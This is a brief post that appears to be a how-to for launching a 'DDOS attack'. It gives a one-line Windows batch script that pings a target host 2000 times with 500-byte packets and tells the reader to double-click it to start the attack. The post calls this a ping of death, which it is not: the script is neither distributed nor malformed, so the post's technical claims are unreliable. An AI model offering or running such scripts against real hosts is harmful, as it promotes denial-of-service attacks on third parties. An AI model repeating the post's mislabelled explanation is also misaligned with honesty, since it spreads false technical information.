DDOS attack - Script

Command to do a DDOS attack: --> This is also called as the ping of death attack Copy the below script into notepad and save it to .bat file. Script: @echo off ping -n 2000 -l 500 <www.example.com> Then double click on bat file, DDOS attack will start